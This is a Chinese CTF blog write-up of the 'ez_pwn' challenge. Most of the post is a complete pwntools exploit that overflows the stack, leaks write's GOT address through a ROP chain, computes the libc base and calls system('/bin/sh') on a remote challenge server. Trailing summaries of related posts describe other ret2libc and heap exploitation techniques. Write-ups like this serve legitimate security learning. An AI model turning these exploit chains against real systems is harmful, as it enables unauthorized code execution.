御网杯

发表于2025-07-25|更新于2025-07-31|PWN不出来

|总字数:406|阅读时长:2分钟|浏览量:

ez_pwn

关闭标准输出流

溢出点

考虑使用wirte(2, got, 0x200)

程序 gadget 有 rdi 和 rsi，rdx 调试后发现没有被修改过还是 200，就无需修改，泄露 write 的真实地址，算出偏移，即可获得 sh

from pwn import * #引用pwntools库
from LibcSearcher import *
misaki=1
if misaki:
    context(log_level='debug',arch='amd64',os='linux')
else:
    context(log_level='debug',arch='i386',os='linux')
ming=1
if ming:
    p=remote('47.105.113.86',30003)#配置远程连接47.105.113.86:30003
else:
    p=process("./pwn")#配置本地连接:

def s(a):#发送
    p.send(a)
def sl(a):#带\n发送
    p.sendline(a)
def sa(a,b):#直到接收到a后发送b
    p.sendafter(a,b)
def sla(a,b):#直到接收到a后发送b带\n
    p.sendlineafter(a,b)
def r():#接收
    p.recv()
def rl(a):#等待到接收到a
    return p.recvuntil(a)
def m():#调用gdb
    gdb.attach(p)

###############################################
len=0X20+8
libc=ELF("libc-2.31.so")
e=ELF("./pwn")
rdi_ret=0x4012c3
ret=0x40101a
close=0x404028
rsi_r15_ret=0x4012c1
write_add=0x401070
main_addr=0x401207
payload=b"a"*len+p64(rdi_ret)+p64(2)
payload+=p64(rsi_r15_ret)+p64(e.got['write'])+p64(0)+p64(write_add)+p64(main_addr)
#m()
s(payload)
rl(b'Close your eye, and you are blind now.')
write= u64(p.recv(8).rjust(8,b'\x00'))
print(f'write====',hex(write))


libc_base = write - libc.sym['write']
print(f'libc_base',hex(libc_base))
sys_addr = libc_base + libc.sym['system']
bin_sh = libc_base +  next(libc.search(b"/bin/sh\x00"))
payload=b"a"*len+p64(rdi_ret)+p64(bin_sh)+p64(sys_addr)
s(payload)
p.interactive()#与程序交互
'''
exec 1>&0
payload=b'A'*len+p64(rdi_ret)+p64(1)
payload+=p64(rsi_r15_ret)+p64(e.got['write']) +p64(0)+p64(e.plt['write'])+p64(0x401207)
s(payload)

payload=b"a"*len+p64(rdi_ret)+p64(2)
payload+=p64(rsi_r15_ret)+p64(2)

'''

相关推荐

1-pwn43 ida打开文件后发现有明显的溢出点有systeam函数可以使用，但是没用/bin/sh，尝试使用libc无法成功 gdb vmmap可以查看到程序有一段可写的部分，可以使用这一部分去写入/bin/sh 使用objdump -d -j .plt pwn命令可以查看到程序的函数plt地址 12345678910111213141516171819202122232425from pwn import * #引用pwntools库context(log_level='debug',arch='i386',os='linux')ming=1if ming: p=remote('pwn.challenge.ctf.show',28282)#配置远程连接 28282else: p=process("pwn")#配置本地连接:#gdb.attach(p)main_add=0x080487AFsystem=0x804845...

浅红欺醉粉，肯信有江梅直接nc连接即可借的东风破金锁输入的内容只要相等即可但是直接输入就超出了范围 ai搜出输入方法 12345678910111213141516171819202122232425262728293031323334353637383940414243from pwn import * #引用pwntools库from LibcSearcher import *misaki=1if misaki: context(log_level='debug',arch='amd64',os='linux')else: context(log_level='debug',arch='i386',os='linux')ming=1if ming: p=remote('challenge.qsnctf.com',31915)#配置远程连接nc challenge.qsnctf.com 31915else: ...

libc 下载链接：https://files.buuoj.cn/files/85ee93d92fc553f78f195a133690eef3/libc-2.23.so 简单的增删改查在 add 中，我们输入 size 创建的 chunk 为 s，固定生成的一个 chunk 为 v3 s 在 v3 内存的上方，后续将 s 的 data 段地址赋值给 v3data 段将 v3 放入 chunk 管理数组 chunk_s 中 edit 函数中有验证 v3->s+v2 的值于 s 的 size 做比较，如果我们在 v3 和 s 之间添加 chunk 使其不连续即可绕过此检查 add 后的 chunk 如图所示 delete 函数中将 s 清空，未将 v3chunk 清空，存在 uaf，但是这题不用 uaf 也可以写 show 输出 s 和 v3 中的 nam 和 test edit 就是上面 add 中的修改 test 中使用的目前我们的思路为：使 s 和 v3 中有其他 chunk 存在，这样我们就可以绕过 edit 中的检测使其修改到别的 chunk 内...

此文章参考了： CTFshow PWN162 堆利用技巧大杂烩_ctfshow-pwn-162-CSDN博客好好说话之IO_FILE利用（1）：利用_IO_2_1_stdout泄露libc_libc泄露方式-CSDN博客使用realloc函数来调整栈帧让one_gadget生效 - ZikH26 - 博客园感谢师傅的讲解本文章只描述了本地是操作是如何打通程序的，远程需要爆破出I0_2_1_stderr_ 的第四位 1/16 概率本题使用了double_free，unsortedbin_attack 、_IO_2_1_stdout、house of spirit，UAF 经典的增删改查 add 后会有一个固定的 0x28 大小的 chunk，和一个自行输入 size 大小的 chunk，size 被限制大小，add 的 chunk 数量也被限制为 0x13，并且 s->data 为 inuse 此时的堆结构 show 是假函数，无法 show delete 函数中，if 检测 chunk_s+v1 实际上并不是inuse 的值，所以这边是一个假判...

muea 中只有 add 和 delete add 中使用的是 realloc 什么是 realloc 呢？可以参考如下文章 https://squarepants0.github.io/2020/11/18/2019-realloc-magic-realloc-yu-tcache/#toc-heading-2 简单来说就说 mallco 和 free 的结合 plus 版 1234567891011void *realloc(void *ptr, size_t size)# ptr=0 && size!=0# 视作mallco(size) 返回对应的地址# ptr!=0 && size==0# 视作free(ptr)#ptr!=0 && size!=0#当上一次mallco返回的ptr值的size > 现在需要申请的size，则会进行缩小，然后多余的进行free#当上一次mallco返回的ptr值的size < 现在需要申请的size，则会进行扩容#如果上一次mallco返回的ptr已经被free了，且 <...

评论

数据加载中